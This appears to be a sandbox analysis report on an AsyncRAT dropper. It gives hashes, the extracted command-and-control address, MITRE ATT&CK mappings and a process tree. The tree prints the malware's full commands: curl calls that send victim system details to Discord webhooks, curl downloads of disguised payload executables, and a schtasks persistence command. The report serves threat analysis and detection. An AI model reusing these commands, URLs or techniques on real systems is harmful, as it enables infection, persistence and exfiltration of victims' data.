asyncrat | 5ab63870b80c8c0b2fb482f1c9581682740feac9ae7a5c0d8fd9b31997865330

Analysis

max time kernel
142s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
14-07-2024 23:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dropper.exe
Size

12KB
MD5

3c7266e1f13c9dd74dba9b7546601d01
SHA1

71434fc2a94fd910820f6b8d7d9440a5c45b7ae0
SHA256

5ab63870b80c8c0b2fb482f1c9581682740feac9ae7a5c0d8fd9b31997865330
SHA512

3b71e65c0d815b6444c6f908af0015491147438977bcb795b318a07b3b78e1c4491cf21265b90c742fb5615a900256bb2e03cf2074993cec07f46dcd6ae111b2
SSDEEP

384:t/kXUT2i7q9bJnz6PbQ4+FBCf3tmfhhD84VCsk:n2n9bJMbIytkhhDJwsk

Score

10^/10

asyncrat default rat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

environmental-blank.gl.at.ply.gg:25944

Attributes

delay
1
install
true
install_file
$77-aachost.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral2/files/0x00070000000234a4-6.dat	family_asyncrat

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation	Dropper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation	Dropper.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation	$77-adchost.exe

Executes dropped EXE 2 IoCs

pid	Process
5100	$77-adchost.exe
4988	$77-aachost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
4	discord.com
6	discord.com
28	discord.com
29	discord.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1644	timeout.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2068	schtasks.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe
5100	$77-adchost.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	5100	$77-adchost.exe
Token: SeDebugPrivilege	4988	$77-aachost.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 1492 wrote to memory of 1228	1492	Dropper.exe	87
PID 1492 wrote to memory of 1228	1492	Dropper.exe	87
PID 1492 wrote to memory of 1228	1492	Dropper.exe	87
PID 1228 wrote to memory of 448	1228	Dropper.exe	89
PID 1228 wrote to memory of 448	1228	Dropper.exe	89
PID 1228 wrote to memory of 448	1228	Dropper.exe	89
PID 448 wrote to memory of 2928	448	cmd.exe	91
PID 448 wrote to memory of 2928	448	cmd.exe	91
PID 448 wrote to memory of 2928	448	cmd.exe	91
PID 1228 wrote to memory of 4592	1228	Dropper.exe	92
PID 1228 wrote to memory of 4592	1228	Dropper.exe	92
PID 1228 wrote to memory of 4592	1228	Dropper.exe	92
PID 4592 wrote to memory of 3144	4592	cmd.exe	94
PID 4592 wrote to memory of 3144	4592	cmd.exe	94
PID 4592 wrote to memory of 3144	4592	cmd.exe	94
PID 1228 wrote to memory of 5100	1228	Dropper.exe	95
PID 1228 wrote to memory of 5100	1228	Dropper.exe	95
PID 1228 wrote to memory of 3684	1228	Dropper.exe	96
PID 1228 wrote to memory of 3684	1228	Dropper.exe	96
PID 1228 wrote to memory of 3684	1228	Dropper.exe	96
PID 3684 wrote to memory of 2252	3684	cmd.exe	98
PID 3684 wrote to memory of 2252	3684	cmd.exe	98
PID 3684 wrote to memory of 2252	3684	cmd.exe	98
PID 1228 wrote to memory of 1088	1228	Dropper.exe	99
PID 1228 wrote to memory of 1088	1228	Dropper.exe	99
PID 1228 wrote to memory of 1088	1228	Dropper.exe	99
PID 1088 wrote to memory of 3024	1088	cmd.exe	101
PID 1088 wrote to memory of 3024	1088	cmd.exe	101
PID 1088 wrote to memory of 3024	1088	cmd.exe	101
PID 5100 wrote to memory of 3236	5100	$77-adchost.exe	102
PID 5100 wrote to memory of 3236	5100	$77-adchost.exe	102
PID 5100 wrote to memory of 3272	5100	$77-adchost.exe	104
PID 5100 wrote to memory of 3272	5100	$77-adchost.exe	104
PID 3236 wrote to memory of 2068	3236	cmd.exe	106
PID 3236 wrote to memory of 2068	3236	cmd.exe	106
PID 3272 wrote to memory of 1644	3272	cmd.exe	107
PID 3272 wrote to memory of 1644	3272	cmd.exe	107
PID 3272 wrote to memory of 4988	3272	cmd.exe	108
PID 3272 wrote to memory of 4988	3272	cmd.exe	108
PID 4988 wrote to memory of 880	4988	$77-aachost.exe	109
PID 4988 wrote to memory of 880	4988	$77-aachost.exe	109
PID 880 wrote to memory of 2444	880	cmd.exe	111
PID 880 wrote to memory of 2444	880	cmd.exe	111

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Dropper.exe
"C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1492
- C:\Users\Admin\AppData\Local\Temp\Dropper.exe
  "C:\Users\Admin\AppData\Local\Temp\Dropper.exe" --restarted
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1228
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:448
  - - C:\Windows\SysWOW64\curl.exe
      curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
      4⤵
      PID:2928
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4592
  - - C:\Windows\SysWOW64\curl.exe
      curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/aachost.mp4?v=1719043456713 --output C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe
      4⤵
      PID:3144
- - C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe
    "C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3236
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpAEED.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3272
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:1644
    - - C:\Users\Admin\AppData\Roaming\$77-aachost.exe
        
        "C:\Users\Admin\AppData\Roaming\$77-aachost.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4988
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: LAGYLXAO\nSystem Architecture: 64-bit\nHWID: 5C6E90B571CDB1116820\nUser HWID: S-1-5-21-2990742725-2267136959-192470804-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:880
        
        C:\Windows\system32\curl.exe
        
        curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.2.9200.0\nProcessors: 8\nMachine Name: LAGYLXAO\nSystem Architecture: 64-bit\nHWID: 5C6E90B571CDB1116820\nUser HWID: S-1-5-21-2990742725-2267136959-192470804-1000\nAnti-Virus: N/A\n```\"}" https://discord.com/api/webhooks/1253983339946311721/Y5y9rYlqtNDdH2oVgyGSNyOVmkPeDk-85oMk9zE0WBv2eMdGhcm9-I4QvfO9tSEJMrHl
        7⤵
        
        PID:2444
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-slchost.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3684
  - - C:\Windows\SysWOW64\curl.exe
      curl https://cdn.glitch.global/42e4040c-5452-4f16-9411-098912f4fa35/sachost.mp4?v=1719043085712 --output C:\Users\Admin\AppData\Local\Temp\$77-slchost.exe
      4⤵
      PID:2252
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.ComponentModel.Win32Exception (0x80004005): The file or directory is corrupted and unreadable at System.Diagnostics.Process.StartWithShellExecuteEx(ProcessStartInfo startInfo) at System.Diagnostics.Process.Start() at System.Diagnostics.Process.Start(ProcessStartInfo startInfo) at Dropper.Dropping.Run(String path) at Dropper.Dropping.Main()"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1088
  - - C:\Windows\SysWOW64\curl.exe
      curl "https://discord.com/api/webhooks/1261985127463125036/0iay0p3hFSXAadjgHnjbgjsn-a1bO9XGOroK_VVitQVAclbl9F_ccLU33Bv4dWccp52Z" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""System.ComponentModel.Win32Exception (0x80004005): The file or directory is corrupted and unreadable
      4⤵
      PID:3024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dropper.exe.log

Filesize
425B

MD5
4eaca4566b22b01cd3bc115b9b0b2196

SHA1
e743e0792c19f71740416e7b3c061d9f1336bf94

SHA256
34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

SHA512
bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77-adchost.exe

Filesize
66KB

MD5
514d0abd73e992c2a1622795b33f17f4

SHA1
96740e82d7a119d808000783507bd92690584fe6

SHA256
b333ecc39a213f6ce650dd4af50d2d201ee6f80dea63ec98132220670469bf53

SHA512
4600baecf44a9cbc7b33fd02d1807628597c6ecc87aeb12b653f6e3a46c951fe9cd789e100d96df8c57b5d0446397c8a639f0c7ee8ef9395c172598ce8185bc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\$77-slchost.exe

Filesize
243B

MD5
34c0d3b6bfae1bf2d66a42203c751041

SHA1
fbcdd028b1e9c8b9765e4f46fb2f09e49cf7f2ff

SHA256
238d7426d2351eb426547af957acca91ecb30b9d76d81eaaf25623ef12c8756a

SHA512
654071e814c22cee728da962315415626fab9532cdf797b09f172fc4b13fd6f808ad38f37fa1ee4c256d0d2d06cdedf78a500290bdcb9b2b74cf0a2e863b18d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAEED.tmp.bat

Filesize
155B

MD5
8758c75b1478e8d7f931d2f161f34751

SHA1
ed1df8272a027c5df8d7e46fb10d92e3495c4238

SHA256
2474eaf644a683d0173c59af17ca8be10e424d000762751255a0bdf2afb01f5e

SHA512
a889dd5033c549bb6a0b340257b8040fa0fc164fb9a112115e5fc60d69d2ed84771b7ba8d411f9f02928abfa76b1520386a002770c7b2c915aca8f6662382e11

Download Submit
memory/1228-4-0x0000000075030000-0x00000000750DB000-memory.dmp

Filesize
684KB

Download
memory/1228-11-0x0000000075030000-0x00000000750DB000-memory.dmp

Filesize
684KB

Download
memory/1492-0-0x000000007506E000-0x000000007506F000-memory.dmp

Filesize
4KB

Download
memory/1492-1-0x0000000000D30000-0x0000000000D3A000-memory.dmp

Filesize
40KB

Download
memory/5100-8-0x0000000000010000-0x0000000000026000-memory.dmp

Filesize
88KB

Download